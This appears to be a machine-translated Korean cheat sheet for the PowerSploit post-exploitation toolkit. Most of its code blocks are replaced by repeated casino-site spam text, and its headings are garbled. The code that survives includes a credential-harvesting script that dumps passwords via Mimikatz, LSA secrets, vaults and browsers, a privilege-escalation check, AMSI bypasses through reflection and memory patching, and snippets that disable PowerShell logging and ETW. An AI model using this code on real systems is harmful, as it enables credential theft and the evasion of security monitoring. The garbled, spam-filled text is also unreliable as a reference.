PowerSploit 열 시트
제품정보
PowerSploit는 Microsoft PowerShell 모듈의 컬렉션으로, 모든 단계의 평가에서 aid 침투 테스터에 사용할 수 있습니다. PowerSploit는 다음과 같은 모듈로 구성되어 있습니다. CodeExecution, ScriptModification, Persistence, AntivirusBypass, Exfiltration, Mayhem, Privesc 및 Recon. 각 단위는 포스트 폭발 활동을 위한 각종 기능을 제공하는 몇몇 기능을 포함합니다.
· Warning: PowerSploit만 사용하거나 테스트할 수 있는 명시적인 권한이 있습니다. 무단 사용은 서비스 또는 지역 법률에 위반할 수 있습니다.
설치하기
GitHub에서 다운로드
카지노사이트
Git 복제
카지노사이트
수입 모듈
카지노사이트
Bypass 실행 정책
카지노사이트
Recon 단위
PowerView 기능
카지노사이트
고급 PowerView 쿼리
카지노사이트
세션 및 로컬 Admin Enumeration
카지노사이트
ACL 및 권한
카지노사이트
Privesc 모듈 (PowerUp)
기본 특전
카지노사이트
서비스 Exploitation
카지노사이트
사이트맵 채용 정보
ο 회원 관리
레지스트리 폭발
카지노사이트
Persistence 단위
등록 관리
카지노사이트
WMI 지속
카지노사이트
사용자 Hunting
카지노사이트
코드Execution 모듈
DLL 주입
카지노사이트
메모리 실행
카지노사이트
Exfiltration 모듈
자료 Exfiltration
카지노사이트
Credential 수확
카지노사이트
AntivirusBypass 모듈
AV 증발
오프화이트
엠에디터 플러그 인 참조:ScriptModification 모듈
스크립트 Obfuscation
카지노사이트
Mayhem 단위
시스템 Disruption
오프화이트
고급 기술
채용정보
카지노사이트
ASREP로스팅
카지노사이트
골든 티켓 공격
카지노사이트
실버 티켓 공격
카지노사이트
DCSync 공격
카지노사이트
자동화 스크립트
도메인 Enumeration 스크립트
카지노사이트
Privilege 확장 본문 바로가기
```powershell
!/usr/bin/env powershell
PowerSploit Privilege Escalation Check
param( [string]$OutputFile = "C:\temp\privesc_results.txt" )
Import PowerUp
Import-Module .\Privesc\PowerUp.ps1
Write-Host "[+] Starting privilege escalation checks..."
try \\{ # Run all checks and save to file Invoke-AllChecks|Tee-Object -FilePath $OutputFile
Write-Host "[+] Privilege escalation checks completed"
Write-Host "[+] Results saved to: $OutputFile"
# Check for immediate wins
$results = Get-Content $OutputFile
if ($results -match "Unquoted Service Path") \\\\{
Write-Host "[!] FOUND: Unquoted service paths - potential privilege escalation!"
\\\\}
if ($results -match "Modifiable Service") \\\\{
Write-Host "[!] FOUND: Modifiable services - potential privilege escalation!"
\\\\}
if ($results -match "AlwaysInstallElevated") \\\\{
Write-Host "[!] FOUND: AlwaysInstallElevated enabled - potential privilege escalation!"
\\\\}
\\} catch \\{ Write-Error "[-] Privilege escalation checks failed: $($_.Exception.Message)" \\} ```의 경우
Credential Harvesting 스크립트
```powershell
!/usr/bin/env powershell
PowerSploit Credential Harvesting Script
param( [string]$OutputDir = "C:\temp\creds" )
Create output directory
if (!(Test-Path $OutputDir)) \\{ New-Item -ItemType Directory -Path $OutputDir -Force \\}
Import modules
Import-Module .\Exfiltration\Exfiltration.psd1 Import-Module .\CodeExecution\CodeExecution.psd1
Write-Host "[+] Starting credential harvesting..."
try \\{ # Mimikatz - dump credentials Write-Host "[+] Running Mimikatz..." Invoke-Mimikatz -Command "sekurlsa::logonpasswords"|Out-File "$OutputDir\logonpasswords.txt" Invoke-Mimikatz -Command "sekurlsa::wdigest"|Out-File "$OutputDir\wdigest.txt" Invoke-Mimikatz -Command "sekurlsa::kerberos"|Out-File "$OutputDir\kerberos.txt" Invoke-Mimikatz -Command "sekurlsa::tspkg"|Out-File "$OutputDir\tspkg.txt"
# Registry secrets
Write-Host "[+] Extracting registry secrets..."
Get-LSASecret|Out-File "$OutputDir\lsa_secrets.txt"
Get-CachedGPPPassword|Out-File "$OutputDir\gpp_passwords.txt"
# Vault credentials
Write-Host "[+] Extracting vault credentials..."
Get-VaultCredential|Out-File "$OutputDir\vault_creds.txt"
# Browser credentials
Write-Host "[+] Extracting browser credentials..."
Get-ChromeDump|Out-File "$OutputDir\chrome_creds.txt"
Get-FirefoxDump|Out-File "$OutputDir\firefox_creds.txt"
Write-Host "[+] Credential harvesting completed"
Write-Host "[+] Results saved to: $OutputDir"
\\} catch \\{ Write-Error "[-] Credential harvesting failed: $($_.Exception.Message)" \\} ```에 대하여
Evasion 기술
AMSI 우회
```powershell
Method 1: Reflection
$a = [Ref].Assembly.GetTypes() | $a | ForEach-Object \\{$.GetMethods() | ForEach-Object \\{if($.Name -like "AmsiInitialize") \\{$_.Invoke($null, @($null, 0))\\}\\}\\} |
Method 2: Memory patching
$Win32 = @" using System; using System.Runtime.InteropServices; public class Win32 \\{ [DllImport("kernel32")] public static extern IntPtr GetProcAddress(IntPtr hModule, string procName); [DllImport("kernel32")] public static extern IntPtr LoadLibrary(string name); [DllImport("kernel32")] public static extern bool VirtualProtect(IntPtr lpAddress, UIntPtr dwSize, uint flNewProtect, out uint lpflOldProtect); \\} "@
Add-Type $Win32 $LoadLibrary = Win32::LoadLibrary("amsi.dll") $Address = Win32::GetProcAddress($LoadLibrary, "AmsiScanBuffer") $p = 0
$Patch = [Byte[]] (0xB8, 0x57, 0x00, 0x07, 0x80, 0xC3)
```의 경우
PowerShell 로깅 우회
```powershell
Disable PowerShell logging
$GPO = [ref].Assembly.GetType('System.Management.Automation.Utils').GetField('cachedGroupPolicySettings','NonPublic,Static') $GPO.SetValue($null, @\\{\\})
Disable script block logging
$settings = [System.Management.Automation.Utils]::GetGroupPolicySettings() $settings['ScriptBlockLogging']['EnableScriptBlockLogging'] = 0 $settings['ScriptBlockLogging']['EnableScriptBlockInvocationLogging'] = 0 ```에 대하여
기타 패스워드
```powershell
Disable ETW
$Provider = [Ref].Assembly.GetType('System.Management.Automation.Tracing.PSEtwLogProvider') $etwProvider = $Provider.GetField('etwProvider','NonPublic,Static').GetValue($null) [System.Diagnostics.Eventing.EventProvider].GetField('m_enabled','NonPublic,Instance').SetValue($etwProvider,0) ```의 경우
통합 예제
Cobalt Strike 통합
카지노사이트
Empire 통합
카지노사이트
Metasploit 통합
카지노사이트
문제 해결
실행 정책 문제
카지노사이트
AMSI 탐지
카지노사이트
Module 수입 문제
카지노사이트
네트워크 연결 문제
```powershell
Test network connectivity
Test-NetConnection -ComputerName "target" -Port 445
Check firewall
Get-NetFirewallRule|Where-Object \\{$_.Enabled -eq "True"\\}
Use alternative ports
Get-DomainController -Server "dc.domain.com:389" ```의 경우
지원하다
- Official PowerSploit 저장소
- PowerSploit 문서
- PowerView 열 시트
- PowerUp 문서
- 액티브 디렉토리 보안
- PowerShell 제국
- BloodHound 통합
이 속임수 시트는 Windows 침투 테스트 및 포스트 폭발에 대한 PowerSploit을 사용하는 포괄적 인 참조를 제공합니다. 항상 이 도구를 사용하기 전에 적절한 권한이 있습니다. 필수